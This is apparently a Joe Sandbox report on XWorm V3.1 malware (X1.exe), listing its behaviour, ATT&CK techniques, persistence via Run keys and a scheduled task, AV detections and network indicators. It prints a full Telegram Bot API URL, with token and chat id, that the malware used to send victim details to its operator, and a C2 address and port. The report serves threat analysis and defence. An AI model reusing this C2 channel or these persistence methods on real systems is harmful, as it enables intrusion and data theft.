                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\X1.exeQueries volume information: C:\Users\user\AppData\Roaming\X1.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\X1.exeQueries volume information: C:\Users\user\AppData\Roaming\X1.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\X1.exeQueries volume information: C:\Users\user\AppData\Roaming\X1.exe VolumeInformation
                            Source: C:\Users\user\Desktop\X1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: X1.exe, 00000000.00000002.3317632463.000000001BD10000.00000004.00000020.00020000.00000000.sdmp, X1.exe, 00000000.00000002.3320628981.000000001BD74000.00000004.00000020.00020000.00000000.sdmp, X1.exe, 00000000.00000002.3323342795.000000001CF8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\X1.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

Source: Yara match | File source: X1.exe, type: SAMPLE
Source: Yara match | File source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: X1.exe PID: 3664, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED
Source: Yara match | File source: X1.exe, type: SAMPLE
Source: Yara match | File source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: X1.exe PID: 3664, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED

                            Remote Access Functionality

Source: Yara match | File source: X1.exe, type: SAMPLE
Source: Yara match | File source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: X1.exe PID: 3664, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED
Source: Yara match | File source: X1.exe, type: SAMPLE
Source: Yara match | File source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: X1.exe PID: 3664, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED
MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 Input Capture | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 23 System Information Discovery | Remote Desktop Protocol | 1 Input Capture | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 2 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 11 Obfuscated Files or Information | Security Account Manager | 441 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 51 Virtualization/Sandbox Evasion | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 13 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 51 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1430689 | Sample: X1.exe | Start date: 24/04/2024 | Architecture: WINDOWS | Score: 100
Contacted domains: api.telegram.org (Uses the Telegram API (likely for C&C communication)); ip-api.com
Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 16 other signatures
Process tree:
X1.exe (started) [graph counters: 15, 8]
    Network: 91.92.252.220, 4442, 49714, THEZONEBG, Bulgaria; ip-api.com 208.95.112.1, 49704, 80, TUT-ASUS, United States; api.telegram.org 149.154.167.220, 443, 49710, TELEGRAMRU, United Kingdom
    Dropped: C:\Users\user\AppData\Roaming\X1.exe, PE32
    Signatures: Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 3 other signatures
    powershell.exe (started) [graph counter: 23]: Loading BitLocker PowerShell Module
        conhost.exe (started)
    powershell.exe (started) [graph counter: 21]
        conhost.exe (started)
    powershell.exe (started) [graph counter: 21]
        conhost.exe (started)
    schtasks.exe (started)
        conhost.exe (started)
X1.exe (started): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
X1.exe (started)
X1.exe (started)

Source | Detection | Scanner | Label | Link
X1.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
X1.exe | 71% | Virustotal | |
X1.exe | 100% | Avira | TR/Spy.Gen |
X1.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\X1.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Roaming\X1.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\X1.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
C:\Users\user\AppData\Roaming\X1.exe | 71% | Virustotal | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
https://contoso.com/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
91.92.252.220 | 0% | Avira URL Cloud | safe |
91.92.252.220 | 12% | Virustotal | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
91.92.252.220 | true | 12%, Virustotal; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2130681568.0000016F58B90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2240905862.0000020690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
https://api.telegram.org/bot | X1.exe, X1.exe.0.dr | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2113461388.0000016F48D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2113461388.0000016F48D49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2130681568.0000016F58B90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2240905862.0000020690070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.2411697517.00000247336A0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2113461388.0000016F48B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723631000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | X1.exe, 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2113461388.0000016F48B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2164373516.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2294748616.0000024723631000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.2294748616.0000024723883000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
91.92.252.220 | unknown | Bulgaria | 34368 | THEZONEBG | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430689
Start date and time: 2024-04-24 02:53:46 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: X1.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@16/17@2/3
EGA Information:
• Successful, ratio: 14.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 74
• Number of non-executed functions: 6
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target X1.exe, PID 5860 because it is empty
                                                      • Execution Graph export aborted for target X1.exe, PID 6112 because it is empty
                                                      • Execution Graph export aborted for target X1.exe, PID 940 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 4304 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 4320 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 6412 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time      Type             Description
02:54:41  API Interceptor  40x Sleep call for process: powershell.exe modified
02:55:19  Task Scheduler   Run new task: X1 path: C:\Users\user\AppData\Roaming\X1.exe
02:55:21  API Interceptor  1001329x Sleep call for process: X1.exe modified
02:55:21  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run X1 C:\Users\user\AppData\Roaming\X1.exe
02:55:29  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run X1 C:\Users\user\AppData\Roaming\X1.exe
02:55:38  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Output.exe | malicious | RedLine, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | X2.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 55HUe105hhh123333.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | PI88009454 007865EQ.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Request for Quotation.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Factura E24000319v00. SL.exe | malicious | AgentTesla, PureLog Stealer, RedLine | ip-api.com/line/?fields=hosting
208.95.112.1 | QUOTATION_APRQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | Wire Transfer Payment Receipt#2024-22-04.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | cb9YYjPyUR.jar | malicious | STRRAT | ip-api.com/json/
208.95.112.1 | Ship Docs_ CI_BL_HBL_.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
149.154.167.220 | Output.exe | malicious | RedLine, XWorm |
149.154.167.220 | X2.exe | malicious | XWorm |
149.154.167.220 | HS202410407 Elemento de proyecto MSMU5083745.pdf.exe | malicious | AgentTesla |
149.154.167.220 | 171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe | malicious | AgentTesla |
149.154.167.220 | gmb.xls | malicious | Unknown |
149.154.167.220 | z1E-catalogSamples.exe | malicious | AgentTesla |
149.154.167.220 | e-dekont.exe | malicious | AgentTesla |
149.154.167.220 | z0LTqIdZ4A.exe | malicious | XWorm |
149.154.167.220 | z1E-catalogSamples.exe | malicious | AgentTesla |
149.154.167.220 | W4tW72sfAD.exe | malicious | DCRat, PureLog Stealer, zgRAT |
91.92.252.220 | Output.exe | malicious | RedLine, XWorm |
91.92.252.220 | X2.exe | malicious | XWorm |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | Output.exe | malicious | RedLine, XWorm | 208.95.112.1
ip-api.com | X2.exe | malicious | XWorm | 208.95.112.1
ip-api.com | 55HUe105hhh123333.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | PI88009454 007865EQ.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | file.exe | malicious | GuLoader, PXRECVOWEIWOEI Stealer | 208.95.112.1
ip-api.com | Request for Quotation.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Factura E24000319v00. SL.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 208.95.112.1
ip-api.com | QUOTATION_APRQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | Wire Transfer Payment Receipt#2024-22-04.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | cb9YYjPyUR.jar | malicious | STRRAT | 208.95.112.1
api.telegram.org | Output.exe | malicious | RedLine, XWorm | 149.154.167.220
api.telegram.org | X2.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | HS202410407 Elemento de proyecto MSMU5083745.pdf.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | 171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | gmb.xls | malicious | Unknown | 149.154.167.220
api.telegram.org | z1E-catalogSamples.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | e-dekont.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | z0LTqIdZ4A.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | z1E-catalogSamples.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | W4tW72sfAD.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
THEZONEBG | Output.exe | malicious | RedLine, XWorm | 91.92.252.220
THEZONEBG | X2.exe | malicious | XWorm | 91.92.252.220
THEZONEBG | pdhmXuEYmc.exe | malicious | RedLine | 91.92.241.122
THEZONEBG | Remittance slip.js | malicious | VjW0rm | 91.92.255.130
THEZONEBG | PROFOMA INVOICE.js | malicious | VjW0rm | 91.92.255.61
THEZONEBG | zirurEg4mX.elf | malicious | Unknown | 91.92.252.191
THEZONEBG | qBSw7aeXEM.exe | malicious | RedLine | 91.92.250.88
THEZONEBG | cXiIHv7tfd.exe | malicious | Lokibot | 91.92.253.228
THEZONEBG | wQkjhw6VZ6.elf | malicious | Gafgyt | 91.92.245.31
THEZONEBG | MFj7OCV6NX.elf | malicious | Gafgyt | 91.92.245.31
TELEGRAMRU | Output.exe | malicious | RedLine, XWorm | 149.154.167.220
TELEGRAMRU | X2.exe | malicious | XWorm | 149.154.167.220
TELEGRAMRU | HS202410407 Elemento de proyecto MSMU5083745.pdf.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | 171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | gmb.xls | malicious | Unknown | 149.154.167.220
TELEGRAMRU | SecuriteInfo.com.Trojan.Nekark.22288.17032.exe | malicious | Unknown | 149.154.167.99
TELEGRAMRU | https://telegrambot-fix.pages.dev/bot.html | malicious | HTMLPhisher | 149.154.167.99
TELEGRAMRU | http://telegrambot-fix.pages.dev/waysin | malicious | HTMLPhisher | 149.154.167.99
TELEGRAMRU | z1E-catalogSamples.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | e-dekont.exe | malicious | AgentTesla | 149.154.167.220
TUT-ASUS | Output.exe | malicious | RedLine, XWorm | 208.95.112.1
TUT-ASUS | X2.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | 55HUe105hhh123333.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | PI88009454 007865EQ.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | file.exe | malicious | GuLoader, PXRECVOWEIWOEI Stealer | 208.95.112.1
TUT-ASUS | Request for Quotation.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Factura E24000319v00. SL.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 208.95.112.1
TUT-ASUS | QUOTATION_APRQTRA031244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | Wire Transfer Payment Receipt#2024-22-04.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | cb9YYjPyUR.jar | malicious | STRRAT | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Output.exe | malicious | RedLine, XWorm | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | X2.exe | malicious | XWorm | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | BARSYL SHIPPING Co (VIETNAM).exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://www.admin-longin.co.jp.mc3lva.cn/ | malicious | Unknown | 149.154.167.220
